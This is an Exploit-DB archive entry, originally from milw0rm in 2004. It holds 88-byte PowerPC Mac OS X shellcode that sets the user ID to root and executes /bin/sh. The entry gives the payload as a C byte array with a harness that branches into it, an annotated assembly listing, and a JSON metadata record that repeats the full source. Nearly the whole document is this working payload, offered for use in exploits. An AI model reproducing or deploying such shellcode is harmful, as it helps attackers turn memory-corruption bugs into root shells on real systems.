ID EDB-ID:13484
Type exploitdb
Reporter B-r00t
Modified 2004-09-26T00:00:00
Description
os-x/PPC setuid(0) + execve /bin/sh 88 bytes. Shellcode exploit for osx_ppc platform
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does setuid(0); execve(/bin/sh); exit(0);
See ASM below.
88 Bytes.
*/
char shellcode[] =
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xdf"
"\x7c\x68\x19\xae\x38\x0a\xfe\xa7"
"\x44\xff\xff\x02\x60\x60\x60\x60"
"\x7c\xa5\x2a\x79\x38\x7f\xfe\xd8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";
int main (void)
{
__asm__("b _shellcode");
}
/*
; PPC OS X / Darwin Shellcode by B-r00t.
; setuid(0) execve(/bin/sh) exit(0)
;
.globl _main
.text
_main:
xor. r3, r3, r3
bnel _main
mflr r11
addi r31, r11, 368
li r10, 368
addi r8, r31, -289
stbx r3, r8, r3
addi r0, r10, -345
.long 0x44ffff02
.long 0x60606060
xor. r5, r5, r5
addi r3, r31, -296
stw r3, -8(r1)
stw r5, -4(r1)
subi r4, r1, 8
addi r0, r10, -309
.long 0x44ffff02
mr r3, r5
addi r0, r10, -367
.long 0x44ffff02
path: .asciz "/bin/shX"
*/
// milw0rm.com [2004-09-26]
{"id": "EDB-ID:13484", "type": "exploitdb", "bulletinFamily": "exploit", "title": "os-x/PPC setuid0 + execve /bin/sh 88 bytes", "description": "os-x/PPC setuid(0) + execve /bin/sh 88 bytes. Shellcode exploit for osx_ppc platform", "published": "2004-09-26T00:00:00", "modified": "2004-09-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/13484/", "reporter": "B-r00t", "references": [], "cvelist": [], "lastseen": "2016-02-01T18:03:11", "viewCount": 7, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-01T18:03:11", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T18:03:11", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/13484/", "sourceData": "/*\r\nPPC OSX/Darwin Shellcode by B-r00t. 2003.\r\nDoes setuid(0); execve(/bin/sh); exit(0);\r\nSee ASM below.\r\n88 Bytes.\r\n*/\r\nchar shellcode[] =\r\n\"\\x7c\\x63\\x1a\\x79\\x40\\x82\\xff\\xfd\"\r\n\"\\x7d\\x68\\x02\\xa6\\x3b\\xeb\\x01\\x70\"\r\n\"\\x39\\x40\\x01\\x70\\x39\\x1f\\xfe\\xdf\"\r\n\"\\x7c\\x68\\x19\\xae\\x38\\x0a\\xfe\\xa7\"\r\n\"\\x44\\xff\\xff\\x02\\x60\\x60\\x60\\x60\"\r\n\"\\x7c\\xa5\\x2a\\x79\\x38\\x7f\\xfe\\xd8\"\r\n\"\\x90\\x61\\xff\\xf8\\x90\\xa1\\xff\\xfc\"\r\n\"\\x38\\x81\\xff\\xf8\\x38\\x0a\\xfe\\xcb\"\r\n\"\\x44\\xff\\xff\\x02\\x7c\\xa3\\x2b\\x78\"\r\n\"\\x38\\x0a\\xfe\\x91\\x44\\xff\\xff\\x02\"\r\n\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";\r\n\r\nint main (void)\r\n{\r\n __asm__(\"b _shellcode\");\r\n}\r\n\r\n\r\n/*\r\n; PPC OS X / Darwin Shellcode by B-r00t.\r\n; setuid(0) execve(/bin/sh) exit(0)\r\n;\r\n.globl _main\r\n.text\r\n_main:\r\n xor. r3, r3, r3\r\n bnel _main\r\n mflr r11\r\n addi r31, r11, 368\r\n li r10, 368\r\n addi r8, r31, -289\r\n stbx r3, r8, r3\r\n addi r0, r10, -345\r\n .long 0x44ffff02\r\n .long 0x60606060\r\n xor. r5, r5, r5\r\n addi r3, r31, -296\r\n stw r3, -8(r1)\r\n stw r5, -4(r1)\r\n subi r4, r1, 8\r\n addi r0, r10, -309\r\n .long 0x44ffff02\r\n mr r3, r5\r\n addi r0, r10, -367\r\n .long 0x44ffff02\r\npath: .asciz \"/bin/shX\"\r\n\r\n*/\n\n// milw0rm.com [2004-09-26]", "osvdbidlist": []}
{}